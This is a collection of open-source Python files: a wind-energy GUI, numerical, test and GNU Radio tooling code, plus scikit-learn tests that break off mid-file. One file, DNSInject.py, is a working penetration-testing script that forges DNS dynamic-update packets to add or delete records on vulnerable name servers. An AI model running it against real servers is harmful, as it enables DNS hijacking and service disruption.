licence = """Wind Energy Engineering Toolkit is free software; you can redistribute it and/or modify it under the terms of the
GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
Wind Energy Engineering Toolkit is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details. You should have received a copy of the
GNU General Public License along with Wind Energy Engineering Toolkit;
if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA"""
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon('/home/aleck/Code/minicodes/sandbox/wec.ico', wx.BITMAP_TYPE_ICO))
info.SetName('Wind Energy Engineering Toolkit')
info.SetVersion('0.1')
info.SetDescription(description)
info.SetCopyright('(C) 2009 Alec Koumjian')
info.SetWebSite('http://www.umass.edu/windenergy/projects/software/mini-code-overview.html')
info.SetLicence(licence)
info.AddDeveloper('Alec Koumjian')
info.AddDocWriter('Alec Koumjian')
info.AddArtist('Alec Koumjian')
# info.AddTranslator('jan bodnar')
wx.AboutBox(info)
## End Menu Operations
## TS Panel Functions
def OnPlotTSButton(self, event):
"""Plot a timeseries object using matplotlib."""
index = self.list_box_1.GetSelections()
fig = self.plot_panel.get_figure()
fig.clear()
axes = fig.gca()
# Draw grids
axes.grid(b=True)
# Plot selected timeseries
for selection in range(len(index)):
axes.plot(self.active_timeseries[index[selection]]['timeseries'].dates.tolist(), self.active_timeseries[index[selection]]['timeseries'], linestyle='-', marker='o', linewidth=1.0)
axes.xaxis_date(tz=None)
## Draw plot
self.plot_panel.draw()
def OnRemoveTSButton(self, event):
"""Remove selected timeseries from the active list and listbox."""
indexes = self.list_box_1.GetSelections()
for index in indexes:
self.remove_timeseries(index)
self.refresh_timeseries()
## General events
def OnTogglePanelButton(self, event):
"""Hide or show a panel when toggle button is pressed."""
btn_panel_table = {'corr':self.corr_panel,'block':self.block_panel,
'arma':self.arma_panel}
name = event.GetEventObject().GetName()
panel = btn_panel_table[name]
if panel.IsShown():
panel.Hide()
event.GetEventObject().SetLabel('>>')
else:
event.GetEventObject().SetLabel('<<')
panel.Show()
panel.GetParent().Layout()
## Analysis Functions
def OnStatButton(self, event):
"""Generate statistics and print to panel."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Stats for "+str(name))
# Collect stats of timeseries
stats = analysis.get_statistics(ts.compressed())
# Create statictext string
text = ""
for field, value in stats.iteritems():
text = ''.join(text+str(field)+": "+str(value)+"\n")
self.results_panel_text.SetLabel(text)
def OnHistButton(self, event):
"""Generate histogram and plot using matplotlib."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
## TODO, add bins field
bins = 10
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Histogram for "+str(name))
fig = self.plot_panel.get_figure()
# Clear old data
fig.clear()
axes = fig.gca()
# Generate histogram data
hist_values, bin_edges = analysis.get_histogram_data(ts.compressed(), bins)
# Create bar graph from histogram data
# Note: We do not use Matplotlib's axes.hist function
# for the sake of consistency. We always generate the data
# Using Numpy's library and then generate a bar graph from it
# Produces identical results to matplotlib.axes.hist
histogram = axes.bar(bin_edges[:-1], hist_values, width=bin_edges[1]-bin_edges[0])
axes.set_xlabel('Wind Speed')
axes.set_ylabel('P(x)')
axes.set_title('Histogram of %s' % (name))
# Redraw graph
self.plot_panel.draw()
def OnWeibullButton(self, event):
"""Retrieve Weibull parameters from selected timeseries."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Weibull Parameters for "+str(name))
# Collect stats of timeseries
stats = analysis.get_statistics(ts.compressed())
c, k = analysis.get_weibull_params(stats['mean'],stats['std'])
# Create statictext string
text = "C: "+str(c)+"\n"+"K: "+str(k)+"\n"
self.results_panel_text.SetLabel(text)
def OnCorrButton(self, event):
"""Generate and plot correlation values."""
if self.rad_autocorr.GetValue():
self.OnAutocorrButton(event)
else:
self.OnCrosscorrButton(event)
def OnAutocorrButton(self, event):
"""Generate and plot autocorrelation values."""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
# Fetch timeseries from dictionary
ts = self.active_timeseries[index[0]]['timeseries']
# Fetch ts name from dictionary
name = self.active_timeseries[index[0]]['name']
# Get lag value
max_lag_increment = self.corr_lag_int.GetValue()
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Autocorrelation values for "+str(name))
# Collect stats of timeseries
lag_values, autocorrelation_values = analysis.autocorrelate(ts.compressed(), max_lag_increment)
# Get Figure
fig = self.plot_panel.get_figure()
# Clear old data
fig.clear()
axes = fig.gca()
# Draw grids
axes.grid(b=True)
# Draw line at y=0
axes.axhline(linewidth=2, color='r')
# Draw autocorrelation values
axes.plot(lag_values, autocorrelation_values, linestyle='-', marker='o', linewidth=1.0)
# Set labels
axes.set_xlabel('Lag')
axes.set_ylabel('Autocorr')
axes.set_title('Autocorrelation of %s' % (name))
# Redraw graph
self.plot_panel.draw()
def OnCrosscorrButton(self, event):
"""Generate and plot crosscorrelation vaules."""
index = self.list_box_1.GetSelections()
if self.valid_selections(2):
# Fetch ts1 from dictionary
ts1 = self.active_timeseries[index[0]]['timeseries']
# Fetch ts1 name from dictionary
name1 = self.active_timeseries[index[0]]['name']
# Fetch ts2 from dictionary
ts2 = self.active_timeseries[index[1]]['timeseries']
# Fetch ts2 name from dictionary
name2 = self.active_timeseries[index[1]]['name']
# Get lag value
max_lag_increment = self.corr_lag_int.GetValue()
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Crosscorrelation values for "+str(name1)+" and "+str(name2))
# Collect stats of timeseries
lag_values, crosscorrelation_values = analysis.crosscorrelate(ts1.compressed(),ts2.compressed(), max_lag_increment)
# Get Figure
fig = self.plot_panel.get_figure()
# Clear old data
fig.clear()
axes = fig.gca()
axes.grid(b=True)
# Draw line at y=0
axes.axhline(linewidth=2, color='r')
# Plot correlation values
axes.plot(lag_values, crosscorrelation_values, linestyle='-', marker='o', linewidth=1.0)
axes.set_xlabel('Lag')
axes.set_ylabel('Crosscorr')
axes.set_title('Crosscorrelation of %s and %s' % (name1,name2))
# Redraw graph
self.plot_panel.draw()
def OnBlockButton(self, event):
"""Create block average of selected timeseries and add to list_box_1"""
index = self.list_box_1.GetSelections()
if self.valid_selections(1):
old_ts_dict = self.active_timeseries[index[0]]
new_freq = str(self.block_new_freq.GetString(self.block_new_freq.GetSelection()))
# Set statusbar message
self.frame_1_statusbar.SetStatusText("Created block average of "+str(self.active_timeseries[index[0]]['name']+" with new frequency "+new_freq))
# Create new timeseries
new_timeseries = analysis.block_average(old_ts_dict['timeseries'].compressed(), new_freq)
new_ts_dict = self.create_ts_dict(new_timeseries, old_ts_dict, new_freq+'_block_avg_of_')
self.add_timeseries(new_ts_dict)
self.refresh_timeseries()
# Set focus
self.list_box_1.SetFocus()
self.list_box_1.SetSelection(len(self.active_timeseries)-1)
def OnPSDButton(self, event):
"""Generate power spectral density info and plot using matplotlib."""
return 0
## End Analysis Functions
## Synthesis Functions
def OnARMAButton(self, event):
"""
Generate timeseries using autoregressive moving average method.
Input: mean, stdev, npoints, autocorr (all from gui inputs)
Output: Add generated timeseries to self.list_box_1
"""
mean = float(self.mean_ctrl.GetValue())
stdev = float(self.stdev_ctrl.GetValue())
npoints = int(self.npoints_ctrl.GetValue())
autocorr = float(self.autocorr_ctrl.GetValue())
arma_ts = synthesis.gen_arma(mean, stdev, autocorr, npoints)
new_ts_dict = self.create_ts_dict(arma_ts, prepend_str='arma_')
self.add_timeseries(new_ts_dict)
self.refresh_timeseries()
## End Synthesis Functions
# End Handler Functions
# end of class MyFrame
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
| kmonsoor/windenergytk | windenergytk/gwindtk.py | Python | gpl-3.0 | 30,991 |
import numpy
def numerov_integration(domain, a, f0, f1):
f = numpy.zeros(len(domain), dtype=numpy.complex)
f[0] = f0
f[1] = f1
step = domain.step
for i in range(2, len(domain)):
phi_i1 = f[i-1] * (2.0 + 5.0 * step**2 * a[i-1] / 6.0)
phi_i2 = f[i-2] * (1.0 - step**2 * a[i-2] / 12.0)
f[i] = (phi_i1 - phi_i2) / (1.0 - step**2 * a[i] / 12.0)
return f
| frapa/Schr | windows/compy/numerov.py | Python | gpl-3.0 | 414 |
#!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
os.system('clear')
title()
# Verifying all required options have a populated value
if name_server is None or new_dns_record is None or ip_value is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record injection..."
print "[*] Sending DNS packet adding " + new_dns_record
print "[*] and pointing it to " + ip_value + "\n"
dns_zone = new_dns_record[new_dns_record.find(".")+1:]
# Craft the packet with scapy
add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=new_dns_record,
type="A", ttl=120, rdata=ip_value)]))
print add_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
parser.add_argument(
"--add", action='store_true',
help="Add \"A\" record to the vulnerable name server.")
parser.add_argument(
"--delete", action='store_true',
help="Delete \"A\" record from the vulnerable name server.")
parser.add_argument(
"-ns", metavar="ns1.test.com",
help="Nameserver to execute the specified action.")
parser.add_argument(
"-d", metavar="mynewarecord.test.com",
help="Domain name to create an A record for.")
parser.add_argument(
"-ip", metavar="192.168.1.1",
help="IP Address the new record will point to.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
os.system('clear')
title()
# Verifying all required options have a populated value
if del_ns is None or del_record is None:
print "[*] ERROR: You did not provide all the required command line options!"
print "[*] ERROR: Please re-run with required options."
sys.exit()
print "[*] Crafting packet for record deletion..."
print "[*] Sending packet which deletes the following record: "
print "[*] " + del_record + "\n"
dns_zone = del_record[del_record.find(".")+1:]
del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
opcode=5,
qd=[DNSQR(qname=dns_zone, qtype="SOA")],
ns=[DNSRR(rrname=del_record, type="ALL",
rclass="ANY", ttl=0, rdata="")]))
print del_packet[DNS].summary()
print "\n[*] Packet created and sent!"
def title():
print "######################################################################"
print "# DNS Injector #"
print "######################################################################\n"
return
if __name__ == '__main__':
# Parse command line arguments
action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
#Chose function based on action variable value
try:
if action_add:
add_a_record(dns_nameserver, dns_record, dns_ip)
elif action_delete:
delete_dns_record(dns_nameserver, dns_record)
else:
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
sys.exit()
except AttributeError:
os.system('clear')
title()
print "[*] ERROR: You didn't provide a valid action."
print "[*] ERROR: Restart and provide your desired action!"
| ChrisTruncer/PenTestScripts | HostScripts/DNSInject.py | Python | gpl-3.0 | 4,615 |
# Copyright (C) 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# Based on test_handler_set_hostname.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit.config import cc_locale
from cloudinit import cloud
from cloudinit import distros
from cloudinit import helpers
from cloudinit import util
from cloudinit.sources import DataSourceNoCloud
from .. import helpers as t_help
from configobj import ConfigObj
from six import BytesIO
import logging
import shutil
import tempfile
LOG = logging.getLogger(__name__)
class TestLocale(t_help.FilesystemMockingTestCase):
def setUp(self):
super(TestLocale, self).setUp()
self.new_root = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.new_root)
def _get_cloud(self, distro):
self.patchUtils(self.new_root)
paths = helpers.Paths({})
cls = distros.fetch(distro)
d = cls(distro, {}, paths)
ds = DataSourceNoCloud.DataSourceNoCloud({}, d, paths)
cc = cloud.Cloud(ds, paths, {}, d, None)
return cc
def test_set_locale_sles(self):
cfg = {
'locale': 'My.Locale',
}
cc = self._get_cloud('sles')
cc_locale.handle('cc_locale', cfg, cc, LOG, [])
contents = util.load_file('/etc/sysconfig/language', decode=False)
n_cfg = ConfigObj(BytesIO(contents))
self.assertEqual({'RC_LANG': cfg['locale']}, dict(n_cfg))
| prometheanfire/cloud-init | tests/unittests/test_handler/test_handler_locale.py | Python | gpl-3.0 | 2,046 |
#! /usr/bin/env python
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import * # noqa: F401
'''Runs a full joinmarket pit (using `nirc` miniircd servers,
with `nirc` options specified as an option to pytest),in
bitcoin regtest mode with 3 maker bots and 1 taker bot,
and does 1 coinjoin. This is intended as an E2E sanity check
but certainly could be extended further.
'''
from common import make_wallets
import pytest
import sys
from jmclient import YieldGeneratorBasic, load_test_config, jm_single,\
sync_wallet, JMClientProtocolFactory, start_reactor, Taker, \
random_under_max_order_choose
from jmbase.support import get_log
from twisted.internet import reactor
from twisted.python.log import startLogging
log = get_log()
# Note that this parametrization is inherited (i.e. copied) from
# the previous 'ygrunner.py' script which is intended to be run
# manually to test out complex scenarios. Here, we only run one
# simple test with honest makers (and for simplicity malicious
# makers are not included in the code). Vars are left in in case
# we want to do more complex stuff in the automated tests later.
@pytest.mark.parametrize(
"num_ygs, wallet_structures, mean_amt, malicious, deterministic",
[
# 1sp 3yg, honest makers
(3, [[1, 3, 0, 0, 0]] * 4, 2, 0, False),
])
def test_cj(setup_full_coinjoin, num_ygs, wallet_structures, mean_amt,
malicious, deterministic):
"""Starts by setting up wallets for maker and taker bots; then,
instantiates a single taker with the final wallet.
The remaining wallets are used to set up YieldGenerators (basic form).
All the wallets are given coins according to the rules of make_wallets,
using the parameters for the values.
The final start_reactor call is the only one that actually starts the
reactor; the others only set up protocol instances.
Inline are custom callbacks for the Taker, and these are basically
copies of those in the `sendpayment.py` script for now, but they could
be customized later for testing.
The Taker's schedule is a single coinjoin, using basically random values,
again this could be easily edited or parametrized if we feel like it.
"""
# Set up some wallets, for the ygs and 1 sp.
wallets = make_wallets(num_ygs + 1,
wallet_structures=wallet_structures,
mean_amt=mean_amt)
#the sendpayment bot uses the last wallet in the list
wallet = wallets[num_ygs]['wallet']
sync_wallet(wallet, fast=True)
# grab a dest addr from the wallet
destaddr = wallet.get_external_addr(4)
coinjoin_amt = 20000000
schedule = [[1, coinjoin_amt, 2, destaddr,
0.0, False]]
""" The following two callback functions are as simple as possible
modifications of the same in scripts/sendpayment.py
"""
def filter_orders_callback(orders_fees, cjamount):
return True
def taker_finished(res, fromtx=False, waittime=0.0, txdetails=None):
def final_checks():
sync_wallet(wallet, fast=True)
newbal = wallet.get_balance_by_mixdepth()[4]
oldbal = wallet.get_balance_by_mixdepth()[1]
# These are our check that the coinjoin succeeded
assert newbal == coinjoin_amt
# TODO: parametrize these; cj fees = 38K (.001 x 20M x 2 makers)
# minus 1K tx fee contribution each; 600M is original balance
# in mixdepth 1
assert oldbal + newbal + (40000 - 2000) + taker.total_txfee == 600000000
if fromtx == "unconfirmed":
#If final entry, stop *here*, don't wait for confirmation
if taker.schedule_index + 1 == len(taker.schedule):
reactor.stop()
final_checks()
return
if fromtx:
# currently this test uses a schedule with only one entry
assert False, "taker_finished was called with fromtx=True"
reactor.stop()
return
else:
if not res:
assert False, "Did not complete successfully, shutting down"
# Note that this is required in both conditional branches,
# especially in testing, because it's possible to receive the
# confirmed callback before the unconfirmed.
reactor.stop()
final_checks()
# twisted logging is required for debugging:
startLogging(sys.stdout)
taker = Taker(wallet,
schedule,
order_chooser=random_under_max_order_choose,
max_cj_fee=(0.1, 200),
callbacks=(filter_orders_callback, None, taker_finished))
clientfactory = JMClientProtocolFactory(taker)
nodaemon = jm_single().config.getint("DAEMON", "no_daemon")
daemon = True if nodaemon == 1 else False
start_reactor(jm_single().config.get("DAEMON", "daemon_host"),
jm_single().config.getint("DAEMON", "daemon_port"),
clientfactory, daemon=daemon, rs=False)
txfee = 1000
cjfee_a = 4200
cjfee_r = '0.001'
ordertype = 'swreloffer'
minsize = 100000
ygclass = YieldGeneratorBasic
# As noted above, this is not currently used but can be in future:
if malicious or deterministic:
raise NotImplementedError
for i in range(num_ygs):
cfg = [txfee, cjfee_a, cjfee_r, ordertype, minsize]
sync_wallet(wallets[i]["wallet"], fast=True)
yg = ygclass(wallets[i]["wallet"], cfg)
if malicious:
yg.set_maliciousness(malicious, mtype="tx")
clientfactory = JMClientProtocolFactory(yg, proto_type="MAKER")
nodaemon = jm_single().config.getint("DAEMON", "no_daemon")
daemon = True if nodaemon == 1 else False
# As noted above, only the final start_reactor() call will
# actually start it!
rs = True if i == num_ygs - 1 else False
start_reactor(jm_single().config.get("DAEMON", "daemon_host"),
jm_single().config.getint("DAEMON", "daemon_port"),
clientfactory, daemon=daemon, rs=rs)
@pytest.fixture(scope="module")
def setup_full_coinjoin():
load_test_config()
jm_single().bc_interface.tick_forward_chain_interval = 10
jm_single().bc_interface.simulate_blocks()
| undeath/joinmarket-clientserver | test/test_full_coinjoin.py | Python | gpl-3.0 | 6,442 |
#
# Copyright 2013, 2018-2020 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
""" Remove blocks module """
import os
import re
import sys
import glob
import logging
from ..tools import remove_pattern_from_file, CMakeFileEditor, CPPFileEditor, get_block_names
from .base import ModTool, ModToolException
logger = logging.getLogger(__name__)
class ModToolRemove(ModTool):
""" Remove block (delete files and remove Makefile entries) """
name = 'remove'
description = 'Remove a block from a module.'
def __init__(self, blockname=None, **kwargs):
ModTool.__init__(self, blockname, **kwargs)
self.info['pattern'] = blockname
def validate(self):
""" Validates the arguments """
ModTool._validate(self)
if not self.info['pattern'] or self.info['pattern'].isspace():
raise ModToolException("Incorrect blockname (Regex)!")
def run(self):
""" Go, go, go! """
# This portion will be covered by the CLI
if not self.cli:
self.validate()
else:
from ..cli import cli_input
def _remove_cc_test_case(filename=None, ed=None):
""" Special function that removes the occurrences of a qa*.cc file
from the CMakeLists.txt. """
modname_ = self.info['modname']
if filename[:2] != 'qa':
return
if self.info['version'] == '37':
(base, ext) = os.path.splitext(filename)
if ext == '.h':
remove_pattern_from_file(self._file['qalib'],
fr'^#include "{filename}"\s*$')
remove_pattern_from_file(self._file['qalib'],
fr'^\s*s->addTest\(gr::{modname_}::{base}::suite\(\)\);\s*$'
)
self.scm.mark_file_updated(self._file['qalib'])
elif ext == '.cc':
ed.remove_value('list',
r'\$\{CMAKE_CURRENT_SOURCE_DIR\}/%s' % filename,
to_ignore_start=f'APPEND test_{modname_}_sources')
self.scm.mark_file_updated(ed.filename)
elif self.info['version'] in ['38', '310']:
(base, ext) = os.path.splitext(filename)
if ext == '.cc':
ed.remove_value(
'list', filename,
to_ignore_start=f'APPEND test_{modname_}_sources')
self.scm.mark_file_updated(ed.filename)
else:
filebase = os.path.splitext(filename)[0]
ed.delete_entry('add_executable', filebase)
ed.delete_entry('target_link_libraries', filebase)
ed.delete_entry('GR_ADD_TEST', filebase)
ed.remove_double_newlines()
self.scm.mark_file_updated(ed.filename)
def _remove_py_test_case(filename=None, ed=None):
""" Special function that removes the occurrences of a qa*.{cc,h} file
from the CMakeLists.txt and the qa_$modname.cc. """
if filename[:2] != 'qa':
return
filebase = os.path.splitext(filename)[0]
ed.delete_entry('GR_ADD_TEST', filebase)
ed.remove_double_newlines()
# Go, go, go!
if not self.skip_subdirs['python']:
py_files_deleted = self._run_subdir(self.info['pydir'], ('*.py',), ('GR_PYTHON_INSTALL',),
cmakeedit_func=_remove_py_test_case)
for f in py_files_deleted:
remove_pattern_from_file(
self._file['pyinit'], fr'.*import\s+{f[:-3]}.*')
remove_pattern_from_file(
self._file['pyinit'], fr'.*from\s+{f[:-3]}\s+import.*\n')
pb_files_deleted = self._run_subdir(os.path.join(
self.info['pydir'], 'bindings'), ('*.cc',), ('list',))
pbdoc_files_deleted = self._run_subdir(os.path.join(
self.info['pydir'], 'bindings', 'docstrings'), ('*.h',), ('',))
# Update python_bindings.cc
blocknames_to_delete = []
if self.info['blockname']:
# A complete block name was given
blocknames_to_delete.append(self.info['blockname'])
elif self.info['pattern']:
# A regex resembling one or several blocks were given
blocknames_to_delete = get_block_names(
self.info['pattern'], self.info['modname'])
else:
raise ModToolException("No block name or regex was specified!")
for blockname in blocknames_to_delete:
ed = CPPFileEditor(self._file['ccpybind'])
ed.remove_value('// BINDING_FUNCTION_PROTOTYPES(', '// ) END BINDING_FUNCTION_PROTOTYPES',
'void bind_' + blockname + '(py::module& m);')
ed.remove_value('// BINDING_FUNCTION_CALLS(', '// ) END BINDING_FUNCTION_CALLS',
'bind_' + blockname + '(m);')
ed.write()
if not self.skip_subdirs['lib']:
self._run_subdir('lib', ('*.cc', '*.h'), ('add_library', 'list'),
cmakeedit_func=_remove_cc_test_case)
if not self.skip_subdirs['include']:
incl_files_deleted = self._run_subdir(
self.info['includedir'], ('*.h',), ('install',))
if not self.skip_subdirs['grc']:
self._run_subdir('grc', ('*.yml',), ('install',))
def _run_subdir(self, path, globs, makefile_vars, cmakeedit_func=None):
""" Delete all files that match a certain pattern in path.
path - The directory in which this will take place
globs - A tuple of standard UNIX globs of files to delete (e.g. *.yml)
makefile_vars - A tuple with a list of CMakeLists.txt-variables which
may contain references to the globbed files
cmakeedit_func - If the CMakeLists.txt needs special editing, use this
"""
if self.cli:
from ..cli import cli_input
# 1. Create a filtered list
files = []
for g in globs:
files = files + sorted(glob.glob(f"{path}/{g}"))
files_filt = []
logger.info(f"Searching for matching files in {path}/:")
if self.info['blockname']:
# Ensure the blockname given is not confused with similarly named blocks
blockname_pattern = ''
if path == self.info['pydir']:
blockname_pattern = f"^(qa_)?{self.info['blockname']}.py$"
elif path == os.path.join(self.info['pydir'], 'bindings'):
blockname_pattern = f"^{self.info['blockname']}_python.cc$"
elif path == os.path.join(self.info['pydir'], 'bindings', 'docstrings'):
blockname_pattern = f"^{self.info['blockname']}_pydoc_template.h$"
elif path == 'lib':
blockname_pattern = f"^{self.info['blockname']}_impl(\\.h|\\.cc)$"
elif path == self.info['includedir']:
blockname_pattern = f"^{self.info['blockname']}.h$"
elif path == 'grc':
blockname_pattern = f"^{self.info['modname']}_{self.info['blockname']}.block.yml$"
for f in files:
if re.search(blockname_pattern, os.path.basename(f)) is not None:
files_filt.append(f)
elif self.info['pattern']:
# A regex resembling one or several blocks were given as stdin
for f in files:
if re.search(self.info['pattern'], os.path.basename(f)) is not None:
files_filt.append(f)
if len(files_filt) == 0:
logger.info("None found.")
return []
# 2. Delete files, Makefile entries and other occurrences
files_deleted = []
yes = self.info['yes']
for f in files_filt:
b = os.path.basename(f)
if not yes and self.cli:
ans = cli_input(
f"Really delete {f}? [Y/n/a/q]: ").lower().strip()
if ans == 'a':
yes = True
if ans == 'q':
sys.exit(0)
if ans == 'n':
continue
files_deleted.append(b)
logger.info(f"Deleting {f}.")
self.scm.remove_file(f)
os.unlink(f)
if (os.path.exists(f'{path}/CMakeLists.txt')):
ed = CMakeFileEditor(f'{path}/CMakeLists.txt')
logger.info(
f"Deleting occurrences of {b} from {path}/CMakeLists.txt...")
for var in makefile_vars:
ed.remove_value(var, b)
if cmakeedit_func is not None:
cmakeedit_func(b, ed)
ed.write()
self.scm.mark_files_updated((f'{path}/CMakeLists.txt'))
return files_deleted
| dl1ksv/gnuradio | gr-utils/modtool/core/rm.py | Python | gpl-3.0 | 9,217 |
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from unittest import TestCase
from sklearn.datasets.samples_generator import make_spd_matrix
from sklearn import hmm
from sklearn import mixture
from sklearn.utils.extmath import logsumexp
from sklearn.utils import check_random_state
from nose import SkipTest
rng = np.random.RandomState(0)
np.seterr(all='warn')
class TestBaseHMM(TestCase):
def setUp(self):
self.prng = np.random.RandomState(9)
class StubHMM(hmm._BaseHMM):
def _compute_log_likelihood(self, X):
return self.framelogprob
def _generate_sample_from_state(self):
pass
def _init(self):
pass
def setup_example_hmm(self):
# Example from http://en.wikipedia.org/wiki/Forward-backward_algorithm
h = self.StubHMM(2)
h.transmat_ = [[0.7, 0.3], [0.3, 0.7]]
h.startprob_ = [0.5, 0.5]
framelogprob = np.log([[0.9, 0.2],
[0.9, 0.2],
[0.1, 0.8],
[0.9, 0.2],
[0.9, 0.2]])
# Add dummy observations to stub.
h.framelogprob = framelogprob
return h, framelogprob
def test_init(self):
h, framelogprob = self.setup_example_hmm()
for params in [('transmat_',), ('startprob_', 'transmat_')]:
d = dict((x[:-1], getattr(h, x)) for x in params)
h2 = self.StubHMM(h.n_components, **d)
self.assertEqual(h.n_components, h2.n_components)
for p in params:
assert_array_almost_equal(getattr(h, p), getattr(h2, p))
def test_do_forward_pass(self):
h, framelogprob = self.setup_example_hmm()
logprob, fwdlattice = h._do_forward_pass(framelogprob)
reflogprob = -3.3725
self.assertAlmostEqual(logprob, reflogprob, places=4)
reffwdlattice = np.array([[0.4500, 0.1000],
[0.3105, 0.0410],
[0.0230, 0.0975],
[0.0408, 0.0150],
[0.0298, 0.0046]])
assert_array_almost_equal(np.exp(fwdlattice), reffwdlattice, 4)
def test_do_backward_pass(self):
h, framelogprob = self.setup_example_hmm()
bwdlattice = h._do_backward_pass(framelogprob)
refbwdlattice = np.array([[0.0661, 0.0455],
[0.0906, 0.1503],
[0.4593, 0.2437],
[0.6900, 0.4100],
[1.0000, 1.0000]])
assert_array_almost_equal(np.exp(bwdlattice), refbwdlattice, 4)
def test_do_viterbi_pass(self):
h, framelogprob = self.setup_example_hmm()
logprob, state_sequence = h._do_viterbi_pass(framelogprob)
refstate_sequence = [0, 0, 1, 0, 0]
assert_array_equal(state_sequence, refstate_sequence)
reflogprob = -4.4590
self.assertAlmostEqual(logprob, reflogprob, places=4)
def test_eval(self):
h, framelogprob = self.setup_example_hmm()
nobs = len(framelogprob)
logprob, posteriors = h.eval([])
assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
reflogprob = -3.3725
self.assertAlmostEqual(logprob, reflogprob, places=4)
refposteriors = np.array([[0.8673, 0.1327],
[0.8204, 0.1796],
[0.3075, 0.6925],
[0.8204, 0.1796],
[0.8673, 0.1327]])
assert_array_almost_equal(posteriors, refposteriors, decimal=4)
def test_hmm_eval_consistent_with_gmm(self):
n_components = 8
nobs = 10
h = self.StubHMM(n_components)
# Add dummy observations to stub.
framelogprob = np.log(self.prng.rand(nobs, n_components))
h.framelogprob = framelogprob
# If startprob and transmat are uniform across all states (the
# default), the transitions are uninformative - the model
# reduces to a GMM with uniform mixing weights (in terms of
# posteriors, not likelihoods).
logprob, hmmposteriors = h.eval([])
assert_array_almost_equal(hmmposteriors.sum(axis=1), np.ones(nobs))
norm = logsumexp(framelogprob, axis=1)[:, np.newaxis]
gmmposteriors = np.exp(framelogprob - np.tile(norm, (1, n_components)))
assert_array_almost_equal(hmmposteriors, gmmposteriors)
def test_hmm_decode_consistent_with_gmm(self):
n_components = 8
nobs = 10
h = self.StubHMM(n_components)
# Add dummy observations to stub.
framelogprob = np.log(self.prng.rand(nobs, n_components))
h.framelogprob = framelogprob
# If startprob and transmat are uniform across all states (the
# default), the transitions are uninformative - the model
# reduces to a GMM with uniform mixing weights (in terms of
# posteriors, not likelihoods).
viterbi_ll, state_sequence = h.decode([])
norm = logsumexp(framelogprob, axis=1)[:, np.newaxis]
gmmposteriors = np.exp(framelogprob - np.tile(norm, (1, n_components)))
gmmstate_sequence = gmmposteriors.argmax(axis=1)
assert_array_equal(state_sequence, gmmstate_sequence)
def test_base_hmm_attributes(self):
n_components = 20
startprob = self.prng.rand(n_components)
startprob = startprob / startprob.sum()
transmat = self.prng.rand(n_components, n_components)
transmat /= np.tile(transmat.sum(axis=1)
[:, np.newaxis], (1, n_components))
h = self.StubHMM(n_components)
self.assertEquals(h.n_components, n_components)
h.startprob_ = startprob
assert_array_almost_equal(h.startprob_, startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
2 * startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
